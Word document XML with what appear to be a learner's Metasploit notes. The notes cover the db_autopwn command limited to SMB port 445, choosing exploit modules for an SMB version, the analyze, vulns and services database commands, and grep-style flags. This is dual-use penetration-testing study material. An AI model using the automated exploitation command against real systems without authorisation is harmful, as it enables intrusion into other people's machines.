    <w:p w14:paraId="7D6FC211" w14:textId="77777777" w:rsidR="00EF2F03" w:rsidRDefault="00EF2F03">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Db_autopwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p -t -PI 445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C4D2C0" w14:textId="77777777" w:rsidR="00EF2F03" w:rsidRDefault="00EF2F03">
      <w:r>
        <w:t xml:space="preserve"># limited to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the port</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 445</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13248667" w14:textId="77777777" w:rsidR="00EF2F03" w:rsidRDefault="00EF2F03"/>
    <w:p w14:paraId="0EF7AA65" w14:textId="77777777" w:rsidR="000E6AAE" w:rsidRDefault="000E6AAE">
      <w:r>
        <w:t xml:space="preserve"># to select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>one ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> research about the target </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and what </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>particular vulnerability</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> that version of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>suffer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from and which modules is to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>use .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="04242438" w14:textId="77777777" w:rsidR="000E6AAE" w:rsidRDefault="000E6AAE"/>
    <w:p w14:paraId="540A2CEA" w14:textId="7626D498" w:rsidR="00EF2F03" w:rsidRDefault="00EF2F03">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E6AAE">
        <w:t xml:space="preserve">Analyze </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D7C94A" w14:textId="79A669A9" w:rsidR="000E6AAE" w:rsidRDefault="000E6AAE">
      <w:r>
        <w:t xml:space="preserve"># Analyze content of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msf_database</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and then provide with the list of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000A1DC9">
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="000A1DC9">
        <w:t>(module)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>suffer</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from (services).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C411F13" w14:textId="77777777" w:rsidR="000E6AAE" w:rsidRDefault="000E6AAE"/>
    <w:p w14:paraId="7100E538" w14:textId="671CE8F5" w:rsidR="000E6AAE" w:rsidRDefault="000E6AAE">
      <w:r>
        <w:t xml:space="preserve">Vulns </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423FC650" w14:textId="30456CAD" w:rsidR="000E6AAE" w:rsidRDefault="000E6AAE">
      <w:r>
        <w:t># show vulnerability discovered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72388A21" w14:textId="77777777" w:rsidR="000E6AAE" w:rsidRDefault="000E6AAE"/>
    <w:p w14:paraId="3DEA4C1A" w14:textId="315E0C2A" w:rsidR="006A2F08" w:rsidRDefault="006A2F08">
      <w:r>
        <w:t xml:space="preserve">Services </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178EBD2D" w14:textId="77777777" w:rsidR="00EF2F03" w:rsidRDefault="00EF2F03"/>
    <w:p w14:paraId="0667D82D" w14:textId="14A91E1A" w:rsidR="00D2110F" w:rsidRPr="00F3419B" w:rsidRDefault="00CA58BE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F3419B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AD5377" w14:textId="43349A03" w:rsidR="00F3419B" w:rsidRPr="00F3419B" w:rsidRDefault="00F3419B" w:rsidP="00F3419B">
      <w:r w:rsidRPr="00F3419B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-e</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3419B">
        <w:t xml:space="preserve"> = pattern (expression), not case sensitivity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3567B268" w14:textId="667D36F4" w:rsidR="00F3419B" w:rsidRPr="00F3419B" w:rsidRDefault="00F3419B" w:rsidP="00F3419B">
      <w:r w:rsidRPr="00F3419B">
        <w:t xml:space="preserve"> Case sensitivity is </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3419B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3419B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F08FAA2" w14:textId="00305F80" w:rsidR="00CA58BE" w:rsidRDefault="00F3419B">
      <w:r w:rsidRPr="00F3419B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F3419B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F3419B">
        <w:t xml:space="preserve"> = ignore case.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00CA5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253"/>
    <w:rsid w:val="000A1DC9"/>
    <w:rsid w:val="000E6AAE"/>
    <w:rsid w:val="0020572D"/>
    <w:rsid w:val="00245919"/>
    <w:rsid w:val="002A4F2E"/>
    <w:rsid w:val="003F3B6D"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006A2F08"/>
    <w:rsid w:val="00760253"/>
    <w:rsid w:val="00840931"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00A72695"/>
    <w:rsid w:val="00C31415"/>
    <w:rsid w:val="00C436FD"/>
    <w:rsid w:val="00CA58BE"/>
    <w:rsid w:val="00D2110F"/>
    <w:rsid w:val="00E87857"/>
    <w:rsid w:val="00ED4006"/>
    <w:rsid w:val="00EF2F03"/>
    <w:rsid w:val="00F3419B"/>
    <w:rsid w:val="00F6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0A3C9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BCF45E1A-1AA2-4C6F-A023-21BB5FEF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2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14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4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3419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aw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.r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352</Words>
  <Characters>1960</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>115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29</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-10-03T06:19:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-03T07:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>